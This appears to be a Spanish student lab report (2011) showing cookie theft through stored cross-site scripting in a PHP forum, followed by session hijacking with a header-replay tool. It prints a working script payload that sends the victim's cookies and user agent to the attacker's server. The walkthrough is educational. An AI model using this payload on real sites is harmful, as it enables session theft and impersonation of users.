Embed Size (px)
DESCRIPTION
2011SUPLANTACIÓN DE IDENTIDADEDUARDO BAYÓN CASCAJO (Windows XP SERVIDOR-VÍCTIMA) JAVIER GARCÍA CAMBRONEL (Windows 7 ATACANTE)Javier García Cambronel y Eduardo bayón Cascajo SEGUNDO DE ASIR 20/11/2011[SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011ROBO DE COOKIESCÓDIGO SERVIDORCÓDIGO ATACANTE ¿CÓMO CONSIGUE EL ATACANTE ENVIAR EL PARÁMETRO URL CON LA COOKIE?SUPLANTACIÓN DE IDENTIDADSEGUNDO DE ASIRPágina 1[SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011ROBO DE COOKIES S
Citation preview
SUPLANTACIÓN DE IDENTIDAD
2011
Javier García Cambronel y Eduardo bayón Cascajo SEGUNDO DE ASIR
20/11/2011
EDUARDO BAYÓN CASCAJO (Windows XP SERVIDOR-VÍCTIMA)
JAVIER GARCÍA CAMBRONEL (Windows 7 ATACANTE)
[SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011
SEGUNDO DE ASIR Página 1
ROBO DE COOKIES
CÓDIGO SERVIDOR
CÓDIGO ATACANTE
¿CÓMO CONSIGUE EL ATACANTE ENVIAR
EL PARÁMETRO URL CON LA COOKIE?
SUPLANTACIÓN DE
IDENTIDAD
[SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011
SEGUNDO DE ASIR Página 2
ROBO DE COOKIES
SUPLANTACIÓN DE IDENTIDAD
En el localhost de la máquina virtual 192.168.1.198/ejer (el sitio
"bueno y/o víctima") tenemos una página web (pagina1.php).
Como vemos en el código hay un inicio de sesión para el único
objeto de guardar una cookie de sesión en el navegador del
usuario y después poder realizar el "robo". Luego el PHP de esta
página lee un archivo foro.txt donde almacena entradas de
mensaje de un hipotético foro. Como es una página de reentrada
de formulario, mira si hay un GET con un mensaje para el foro,
en cuyo caso lo añade al archivo foro.txt. Luego presenta los
mensajes del foro y un formulario para que el usuario envíe un
nuevo mensaje si lo desea.
CÓDIGO SERVIDOR
El atacante por otro lado tiene una página PHP en su sitio 192.168.1.34/ejer
página con el nombre cookies.php que contiene este código:
[SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011
SEGUNDO DE ASIR Página 3
CÓDIGO ATACANTE
El atacante tiene un archivo de texto que se llama cookies.txt donde va a guardar las
cookies robadas. Intentará enviar las cookies desde el navegador del usuario a través de
un parámetro URL llamado cookies-robadas, por lo que consultará si hay algo en el GET.
Si es así lo graba en el archivo. Luego vuelve a redirigir al usuario a la página del foro del
"sitio bueno".
¿CÓMO CONSIGUE EL ATACANTE ENVIAR EL PARÁMETRO URL CON LA COOKIE?
Pues por ejemplo, enviando este mensaje al foro:
<script type="text/javascript">window.onunload = function(){
document.location = "http://192.168.1.34/ejer/cookies.php?cookies-robadas=" +
document.cookie + "&navegador=" + navigator.userAgent;}</script>
Enviamos el mensaje:
[SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011
SEGUNDO DE ASIR Página 4
Cuando uno o varios usuarios en el "sitio bueno" pulsen el botón para enviar su mensaje,
entonces éste llegará al localhost de la máquina virtual (servidor) y se guardará con el resto
de mensajes del foro.
Al reenviar el servidor la página otra vez al usuario con su mensaje actualizado en el
foro, se produce un evento window.onunload de la ventana, lo que pone en ejecución el
script inyectado.
Este script hace una redirección al localhost del atacante portando como parámetro URL
todas las cookies del navegador del usuario que tenga almacenadas de la máquina
virtual donde está navegando.
[SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011
SEGUNDO DE ASIR Página 5
Luego ya en el sitio del atacante queda guardar esas cookies y redirigir a la máquina
virtual sin que el usuario note el proceso. Consiguiendo las ansiadas Cookies.
EMPEZANDO LA SUPLANTACIÓN DE IDENTIDAD UNA VEZ TENEMOS
LA COOKIE
Existe un programa para Firefox, que funciona como una extensión del navegador, que
se puede instalar para tener información sobre las cabeceras del HTTP. El programa se
llama
LiveHttpHeaders y se puede encontrar toda la información, aunque en inglés, en:
http://livehttpheaders.mozdev.org/
En el menú "Herramientas" de Firefox (si no lo encontráis haceros un favor y pulsar la
tecla ALT de vuestro teclado.) se añade una opción llamada "Live HTTP Headers", que
abre una ventana con las cabeceras HTTP que se van enviando y recibiendo a medida
que se navega por los sitios web. Las cabeceras aparecen en tiempo real a medida que se
van generando.
Una opción en la ventana de cabeceras en tiempo real que permite repetir una solicitud
al servidor web, editando las cabeceras del HTTP para cambiarlas tal como nos A
nosotros nos interesa cambiarla claro que sí, con la COOKIE que hemos ROBADO.
Antes nos hemos metido en la página como atacante y nos reconoce como usuario
diciéndonos que nos hemos metido ya en esta página y la hora a la que ha sido.
[SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011
SEGUNDO DE ASIR Página 6
Antes de la modificación vemos que la información del atacante mostraba era que nos
hemos metido desde el ordenador del atacante el 20 de noviembre de 2011 a las 19:16:10
esa información la lleva la cookie no olvidemos que es un archivo con información (en este
caso la información que tiene del usuario es la hora pero podría ser una contraseña, el
método es el mismo)
Lo que hacemos entonces es insertar el valor de la cookie que hemos robado copiamos el
valor de la cookie el SID en casos en los que este encriptado completamente pues no
deja de ser un valor, pero que nosotros no lo interpretamos fácilmente y es entendible
por el navegador.
[SUPLANTACIÓN DE IDENTIDAD] 20 de noviembre de 2011
SEGUNDO DE ASIR Página 7
Lo pegamos en el lugar correspondiente quedando como vemos en la imagen.
Pulsamos el botón de repetir y PERFECTO ya estamos entrando como si fuéramos la víctima
Hemos terminado haciendo la “SUPLANTACIÓN DE IDENTIDAD” como demuestra la
información en el navegador del atacante.
